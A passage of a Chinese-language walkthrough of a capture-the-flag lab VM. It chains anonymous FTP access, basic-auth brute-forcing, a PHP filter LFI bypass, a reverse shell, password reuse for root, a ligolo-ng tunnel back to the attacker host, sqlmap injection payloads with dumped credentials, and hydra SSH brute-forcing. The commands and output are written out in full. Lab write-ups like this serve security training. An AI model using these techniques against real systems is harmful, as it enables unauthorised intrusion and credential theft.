信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.136  08:00:27:f3:52:2c       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fe:fd:5b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.039 seconds (125.55 hosts/sec). 4 responded
❯ export ip=192.168.60.136
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Port scanning: Because every port has a story to tell.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.136:21
Open 192.168.60.136:22
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 20:02 CST
Initiating ARP Ping Scan at 20:02
Scanning 192.168.60.136 [1 port]
Completed ARP Ping Scan at 20:02, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:02
Completed Parallel DNS resolution of 1 host. at 20:02, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:02
Scanning 192.168.60.136 [2 ports]
Discovered open port 21/tcp on 192.168.60.136
Discovered open port 22/tcp on 192.168.60.136
Completed SYN Stealth Scan at 20:02, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.136
Host is up, received arp-response (0.00046s latency).
Scanned at 2025-04-13 20:02:37 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
MAC Address: 08:00:27:F3:52:2C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

发现并没有开放常规的80端口

匿名用户登录

存在21端口，尝试枚举是否允许anonymous用户登录

存在两个文件flag.txt .passwd

❯ ftp [email protected]
Connected to 192.168.60.136.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||44130|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Feb 16  2023 .
drwxr-xr-x    2 0        115          4096 Feb 16  2023 ..
-rw-r--r--    1 0        0              34 Feb 16  2023 .passwd
-rw-r--r--    1 0        0             256 Feb 16  2023 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||49174|)
150 Opening BINARY mode data connection for flag.txt (256 bytes).
100% |******************************|   256      396.19 KiB/s    00:00 ETA
226 Transfer complete.
256 bytes received in 00:00 (226.03 KiB/s)
ftp> get .passwd
local: .passwd remote: .passwd
229 Entering Extended Passive Mode (|||60914|)
150 Opening BINARY mode data connection for .passwd (34 bytes).
100% |******************************|    34       35.06 KiB/s    00:00 ETA
226 Transfer complete.
34 bytes received in 00:00 (19.37 KiB/s)
ftp> exit
221 Goodbye.

分别查看一下

得到flag1和某个用户的密码

❯ cat flag.txt

▄▀█ █▄ █ █▀█ █▄ █ █▄█ █▀▄▀█ █▀█ █ █ █▀
█▀█ █ ▀█ █▄█ █ ▀█  █  █ ▀ █ █▄█ █▄█ ▄█

Flag 1: HELL{4N0NYM0U5_15_7H3_B357_U53R}

❯ cat .passwd

The password is: webserver2023!

哦哦，忘记靶机还有个操作没做，在描述中要求启动后用run:run凭证登录后运行sudo run

会启动docker服务

再扫一下端口，这回就有80端口了

❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.136:21
Open 192.168.60.136:22
Open 192.168.60.136:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 20:31 CST
Initiating ARP Ping Scan at 20:31
Scanning 192.168.60.136 [1 port]
Completed ARP Ping Scan at 20:31, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:31
Completed Parallel DNS resolution of 1 host. at 20:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:31
Scanning 192.168.60.136 [3 ports]
Discovered open port 21/tcp on 192.168.60.136
Discovered open port 22/tcp on 192.168.60.136
Discovered open port 80/tcp on 192.168.60.136
Completed SYN Stealth Scan at 20:31, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.136
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-04-13 20:31:38 CST for 0s

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 63
MAC Address: 08:00:27:F3:52:2C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

尝试目录枚举，发现扫不出来

查看一下网站类型，得到401未授权

❯ whatweb -v $ip
WhatWeb report for http://192.168.60.136
Status    : 401 Unauthorized
Title     : 401 Unauthorized
IP        : 192.168.60.136
Country   : RESERVED, ZZ

Summary   : Apache[2.4.52], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], WWW-Authenticate[Restricted Content][Basic]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.52 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Ubuntu Linux
        String       : Apache/2.4.52 (Ubuntu) (from server string)

[ WWW-Authenticate ]
        This plugin identifies the WWW-Authenticate HTTP header and
        extracts the authentication method and realm.

        Module       : Basic
        String       : Restricted Content

HTTP Headers:
        HTTP/1.1 401 Unauthorized
        Date: Sun, 13 Apr 2025 12:34:36 GMT
        Server: Apache/2.4.52 (Ubuntu)
        WWW-Authenticate: Basic realm="Restricted Content"
        Content-Length: 461
        Connection: close
        Content-Type: text/html; charset=iso-8859-1

用户名枚举

浏览器访问一下，发现需要登录，通过Basic authorization认证的

利用上面获得的密码，尝试枚举一下用户，模拟登录一下

得到用户beilul可以通过凭证登录

❯ wfuzz -c -u "http://$ip" --basic FUZZ:webserver2023! -w /usr/share/seclists/Usernames/Names/names.txt --hc 401
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.136/
Total requests: 10177

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001003:   200        34 L     92 W       1386 Ch     "beilul"

得到flag2为HELL{BRUT3_F0RC3_M4Y_B3_4N_0P710N}

LFI2Rce

发现存在功能可以让你选择配置，选择后会传参profile=eddiedota.html

猜测存在LFI文件包含

常规利用路径穿越的方法，会显示Atack detected

可能代码中进行了过滤检测

利用php过滤器尝试读取网页源码

❯ curl 'http://192.168.60.136/index.php?profile=php://filter/convert.base64-encode/resource=../../../var/www/html/index.php' -H "Authorization: Basic YmVpbHVsOndlYnNlcnZlcjIwMjMh" -s

……………………省略…………………………
PCFkb2N0eXBlIGh0bWw+CjxodG1sIGxhbmc9ImVuLVVTIj4KICA8aGVhZD4KICAgIDxtZXRhIGNoYXJzZXQ9InV0Zi04Ij4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSI+Cgo8dGl0bGU+UHJvZmlsZXM8L3RpdGxlPgo8bGluayByZWw9InNob3J0Y3V0IGljb24iIHR5cGU9ImltYWdlL3BuZyIgc2l6ZXM9IjY0eDY0IiBocmVmPSJodHRwczovL2F2YXRhcnMuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3UvOTU4OTk1NDg/dj00Ij4KPGxpbmsgaHJlZj0iaHR0cHM6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU9wZW4rU2Fuczo0MDAsNzAwIiByZWw9InN0eWxlc2hlZXQiPjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9nYXRvZ2FtZXIxMTU1LmdpdGh1Yi5pby9hZG1pbi9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KPGJvZHkgY2xhc3M9ImFsaWduIj4KCjw/cGhwCiAgICBlY2hvICLiloTiloDilojigIPilojilpHilojigIPiloDilojiloDigIPilojilpHilojigIPilojiloDilojigIPilojiloDilojigIPilojigIPiloDilojigIPiloTiloDilojigIPiloDilojiloDigIPilojigIPilojiloDilojigIPilojiloTilpHilogiOwogICAgZWNobyAiPGJyPiI7CiAgICBlY2hvICLilojiloDilojigIPilojiloTilojigIPilpHilojilpHigIPilojiloDilojigIPilojiloTilojigIPilojiloDiloTigIPilojigIPilojiloTigIPilojiloDilojigIPilpHilojilpHigIPilojigIPilojiloTilojigIPilojilpHiloDilogiOwogICAgZWNobyAiPGJyPjxicj4iOwogICAgZWNobyAiPGNlbnRlcj5GbGFnIDI6IEhFTEx7QlJVVDNfRjBSQzNfTTRZX0IzXzROXzBQNzEwTn08Y2VudGVyPiI7CiAgICBlY2hvICI8YnI+PGJyPiI7Cgo/PgoKPGZvcm0gYWN0aW9uPSJpbmRleC5waHAiIG1ldGhvZD0iZ2V0Ij4KICA8bGFiZWwgZm9yPSJvcHRpb24iPlNlbGVjdCBQcm9maWxlOjwvbGFiZWw+CiAgPHNlbGVjdCBpZD0ib3B0aW9uIiBuYW1lPSJwcm9maWxlIiBvbmNoYW5nZT0idGhpcy5mb3JtLnN1Ym1pdCgpIiBzdHlsZT0iYmFja2dyb3VuZC1jb2xvcjogIzMzMzsgY29sb3I6ICNmZmY7Ij4KICAgIDxvcHRpb24gdmFsdWU9InM0dml0YXIuaHRtbCI+ZGVmYXVsdDwvb3B0aW9uPgogICAgPG9wdGlvbiB2YWx1ZT0iczR2aXRhci5odG1sIj5zNHZpdGFyPC9vcHRpb24+CiAgICA8b3B0aW9uIHZhbHVlPSJlZGRpZWRvdGEuaHRtbCI+RWRkaWVEb3RhPC9vcHRpb24+CiAgICA8b3B0aW9uIHZhbHVlPSJ0eGhha2EuaHRtbCI+VHhoYWthPC9vcHRpb24+CiAgICA8b3B0aW9uIHZhbHVlPSJ4ZGFubjEuaHRtbCI+eERhTk4xPC9vcHRpb24+CiAgICA8b3B0aW9uIHZhbHVlPSJnYXRvZ2FtZXIxMTU1Lmh0bWwiPkdhdG9HYW1lcjExNTU8L29wdGlvbj4KICAgIDxvcHRpb24gdmFsdWU9Im9ueXguaHRtbCI+T05ZWDwvb3B0aW9uPgogICAgPG9wdGlvbiB2YWx1ZT0iMGJmeGdoMHN0Lmh0bWwiPjBiZnhnaDBzdDwvb3B0aW9uPgogIDwvc2VsZWN0Pgo8L2Zvcm0+PGJyPgoKPC9ib2R5Pgo8L2h0bWw+Cgo8P3BocAogICAgJGZpbGUgPSBpc3NldCgkX0dFVFsncHJvZmlsZSddKSA/ICRfR0VUWydwcm9maWxlJ10gOiAnczR2aXRhci5odG1sJzsKCiAgICBpZiAoc3Vic3RyKCRmaWxlLCAwLCAxKSAhPT0gIi8iICYmIHN1YnN0cigkZmlsZSwgMCwgMikgIT09ICIuLiIgJiYgc3Vic3RyKCRmaWxlLCAwLDIpICE9PSAiLi8iICkgewogICAgICAgIGluY2x1ZGUoJGZpbGUpOwogICAgfQoKICAgIGVsc2UgZWNobyAiPGgxPkF0YWNrIGRldGVjdGVkPC9oMT4iOwoKPz4K

解码一下，得到源码

果然进行了过滤./之类的字符

<!doctype html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

<title>Profiles</title>
<link rel="shortcut icon" type="image/png" sizes="64x64" href="https://avatars.githubusercontent.com/u/95899548?v=4">
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700" rel="stylesheet"><link rel="stylesheet" href="https://gatogamer1155.github.io/admin/style.css">
</head>

<body>
<body class="align">

<?php
    echo "▄▀█ █░█ ▀█▀ █░█ █▀█ █▀█ █ ▀█ ▄▀█ ▀█▀ █ █▀█ █▄░█";
    echo "<br>";
    echo "█▀█ █▄█ ░█░ █▀█ █▄█ █▀▄ █ █▄ █▀█ ░█░ █ █▄█ █░▀█";
    echo "<br><br>";
    echo "<center>Flag 2: HELL{BRUT3_F0RC3_M4Y_B3_4N_0P710N}<center>";
    echo "<br><br>";

?>

<form action="index.php" method="get">
  <label for="option">Select Profile:</label>
  <select id="option" name="profile" onchange="this.form.submit()" style="background-color: #333; color: #fff;">
    <option value="s4vitar.html">default</option>
    <option value="s4vitar.html">s4vitar</option>
    <option value="eddiedota.html">EddieDota</option>
    <option value="txhaka.html">Txhaka</option>
    <option value="xdann1.html">xDaNN1</option>
    <option value="gatogamer1155.html">GatoGamer1155</option>
    <option value="onyx.html">ONYX</option>
    <option value="0bfxgh0st.html">0bfxgh0st</option>
  </select>
</form><br>

</body>
</html>

<?php
    $file = isset($_GET['profile']) ? $_GET['profile'] : 's4vitar.html';

    if (substr($file, 0, 1) !== "/" && substr($file, 0, 2) !== ".." && substr($file, 0,2) !== "./" ) {
        include($file);
    }

    else echo "<h1>Atack detected</h1>";

?>

参考HackMyVM-Medusa-Walkthrough | Pepster’Blog

用户提权

如法炮制，弹个shell过来

发现容器内存在perl，利用perl反弹shell

监听端口

得到flag3

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from 81784ea2fbf9-192.168.60.136-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/81784ea2fbf9~192.168.60.136_Linux_x86_64/2025_04_13-21_03_14-321.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@81784ea2fbf9:/var/www/html$ cat flag.txt

█   █▀▀ █ ▀█ █▀█ █▀▀ █▀▀
█▄▄ █▀  █ █▄ █▀▄ █▄▄ ██▄

Flag 3: HELL{LF1_F1LT7R_CH41N_G3N3R4T0R}

想办法拿到root，猜测存在密码复用

www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ su root
Password:
root@81784ea2fbf9:/tmp/toolkit-DSoHpKOn# cat /root/flag.txt

█▀█ █▀█ █▀█ ▀█▀   █▀█ █▀█   █▄ █ █▀█ ▀█▀
█▀▄ █▄█ █▄█  █    █▄█ █▀▄   █ ▀█ █▄█  █

Flag 4: HELL{CR3D3NT14LS_1N_HTP455WD_3H?}

猜测靶机中还存在其他容器，查看当前容器ip为172.17.0.2

内网信息收集

尝试上传fscan扫一下其他容器开放哪些服务

www-data@81784ea2fbf9:/var/www$ cd /tmp/
www-data@81784ea2fbf9:/tmp$
[!] Session detached ⇲

(Penelope)─(Session [1])> upload ../toolkit/
[+] Upload OK /tmp/toolkit-DSoHpKOn

(Penelope)─(Session [1])> interact
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/81784ea2fbf9~192.168.60.136_Linux_x86_64/2025_04_13-21_03_14-321.log 📜
www-data@81784ea2fbf9:/tmp$ cd toolkit-DSoHpKOn/
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ hostname -I
172.17.0.2
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ ./fscan -h 172.17.0.1/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 172.17.0.0-172.17.0.255
[*] 已生成IP范围: 172.17.0.0 - 172.17.0.255
[*] 已解析CIDR 172.17.0.1/24 -> IP范围 172.17.0.0-172.17.0.255
[*] 最终有效主机数量: 256
[-] 正在尝试无监听ICMP探测...
[-] 当前用户权限不足,无法发送ICMP包
[*] 切换为PING方式探测...
[+] 目标 172.17.0.2      存活 (ICMP)
[+] 目标 172.17.0.3      存活 (ICMP)
[+] 目标 172.17.0.1      存活 (ICMP)
[+] ICMP存活主机数量: 3
[*] 共解析 218 个有效端口
[+] 端口开放 172.17.0.3:80
[+] 端口开放 172.17.0.2:80
[+] 端口开放 172.17.0.1:22
[+] 端口开放 172.17.0.3:22
[+] 端口开放 172.17.0.1:21
[+] 端口开放 172.17.0.1:80
[+] 存活端口数量: 6
[*] 开始漏洞扫描...
[*] 网站标题 http://172.17.0.2         状态码:401 长度:457    标题:401 Unauthorized
[+] ftp 172.17.0.1:21:anonymous
   [->]flag.txt
[*] 网站标题 http://172.17.0.3         状态码:200 长度:761    标题:""
[*] 网站标题 http://172.17.0.1         状态码:401 长度:457    标题:401 Unauthorized
[!] 扫描错误 172.17.0.1:22 - 扫描总时间超时: context deadline exceeded
[!] 扫描错误 172.17.0.3:22 - 扫描总时间超时: context deadline exceeded
[+] 扫描已完成: 6/6
[*] 扫描结束,耗时: 24.825705749s

Ligolo链接

利用ligolo建立TUN隧道

具体参考TheHackersLabs-TheOffice-Walkthrough | Pepster’Blog

#靶机中执行
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ ./ligolo_agent -connect 192.168.60.100:11601 --ignore-cert &
[1] 815
www-data@81784ea2fbf9:/tmp/toolkit-DSoHpKOn$ WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                        addr="192.168.60.100:11601"
--------------------------------------------------
#kali执行
❯ sudo ./proxy -selfcert
[sudo] password for Pepster:
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » interface_create --name docker
INFO[0007] Creating a new "docker" interface...
INFO[0007] Interface created!
ligolo-ng » INFO[0054] Agent joined.                                 id=9991fa7a-556f-410d-b586-b5c3e09e61d5 name=www-data@81784ea2fbf9 remote="192.168.60.136:46024"
ligolo-ng » session
? Specify a session : 1 - www-data@81784ea2fbf9 - 192.168.60.136:46024 - 9991fa7a-556f-410d-b586-b5c3e09e61d5
[Agent : www-data@81784ea2fbf9] » tunnel_start --tun docker
[Agent : www-data@81784ea2fbf9] » INFO[0127] Starting tunnel to www-data@81784ea2fbf9 (9991fa7a-556f-410d-b586-b5c3e09e61d5)
-------------------------------------------------
❯ sudo ip route add 172.17.0.0/24 dev docker
[sudo] password for Pepster:

浏览器访问一下

有个提示我已修改应用程序，只会显示当SQL查询已被处理时。由于出现了漏洞，我更倾向于暂停它而不是让您看到所有信息。

SQL注入

枚举一下另一个容器的80端口目录

发现存在admin目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.3
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 308] [--> http://172.17.0.3/admin/]
/index.html           (Status: 200) [Size: 761]
Progress: 15792 / 132925 (11.88%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 15849 / 132925 (11.92%)
===============================================================
Finished
===============================================================

猜测可能含有SQL注入

上sqlmap梭哈一下，存在boolean-based布尔盲注还有time-based时间盲注

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch
……………………省略测试过程……………………
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 1509=1509 AND 'ahWV'='ahWV

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 2946 FROM (SELECT(SLEEP(5)))hSkh) AND 'UZYQ'='UZYQ
---
[21:19:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 22.04 (jammy)
web application technology: Apache 2.4.52
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:19:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 170 times
[21:19:58] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:19:58 /2025-04-13/

继续梭，分别从creds example数据库中得到users表

内含有用户的凭证信息

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch --dbs
………………省略测试内容………………
---
[*] creds
[*] example
[*] information_schema

[21:22:03] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:22:03 /2025-04-13/

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D creds --tables
………………省略测试内容………………
---
+-------+
| users |
+-------+

[21:22:31] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:22:31 /2025-04-13/

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D creds -T users --dump
………………省略测试内容………………
---
+-------------------+----------+
| password          | username |
+-------------------+----------+
| beltran48         | marco    |
| iamoswe2023!      | txhaka   |
| superrootpassword | root     |
+-------------------+----------+

[21:22:50] [INFO] table 'creds.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/creds/users.csv'
[21:22:50] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:22:50 /2025-04-13/
# 另一个example数据库
❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D example --tables
+-------+
| users |
+-------+

[21:43:38] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:43:38 /2025-04-13/

❯ sqlmap -u "http://172.17.0.3/admin/index.php?id=1" --batch -D example -T users --dump

+----+----------+
| id | username |
+----+----------+
| 1  | gato     |
| 2  | eddie    |
| 3  | txhaka   |
| 4  | s4vitar  |
| 5  | root     |
+----+----------+

[21:45:40] [INFO] table 'example.users' dumped to CSV file '/home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/example/users.csv'
[21:45:40] [INFO] fetched data logged to text files under '/home/Pepster/.local/share/sqlmap/output/172.17.0.3'

[*] ending @ 21:45:40 /2025-04-13/

文本处理一下

❯ awk -F , 'NR>1 && $1!="" && $2!="" {print $2}' /home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/creds/users.csv|tee user.txt
marco
txhaka
root
❯ awk -F , 'NR>1 && $1!="" && $2!="" {print $2}' /home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/example/users.csv|tee user2.txt
gato
eddie
txhaka
s4vitar
root
❯ awk -F , 'NR>1 && $1!="" && $2!="" {print $1}' /home/Pepster/.local/share/sqlmap/output/172.17.0.3/dump/creds/users.csv|tee user2.txt
beltran48
iamoswe2023!
superrootpassword

hydra爆破

尝试利用hydra爆破一下172.17.0.3容器的ssh服务

得到凭证txhaka:iamoswe2023!

❯ hydra -L user.txt -P pass.txt ssh://172.17.0.3
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-13 21:58:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://172.17.0.3:22/
[22][ssh] host: 172.17.0.3   login: txhaka   password: iamoswe2023!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-13 21:58:33

尝试连接一下

❯ ssh [email protected]
The authenticity of host '172.17.0.3 (172.17.0.3)' can't be established.
ED25519 key fingerprint is SHA256:MclgaIFcKHnKBJxp/4+QZYCN7VmpZu/Qt2QEvqYriNo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.17.0.3' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-60-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Feb 16 02:49:04 2023 from 172.17.0.1
txhaka@748760521d12:~$ cat flag.txt

█▀ █▀█ █   █   █▄▄ █▀█ █▀█ █   █▀▀ ▄▀█ █▄ █
▄█ ▀▀█ █▄▄ █   █▄█ █▄█ █▄█ █▄▄ ██▄ █▀█ █ ▀█

Flag 5: HELL{7H3_B00L34N_15_4150_4_VU1N}

发现容器内的root用户密码是正确的，只不过ssh不允许root用户登录

txhaka@748760521d12:~$ su root
Password:
root@748760521d12:/home/txhaka# cd ~
root@748760521d12:~# ls
creds  flag.txt  message.txt
root@748760521d12:~# cat flag.txt

█▀█ █▀█ █▀█ ▀█▀         ▄▀█ █▀▀ ▄▀█ █ █▄ █
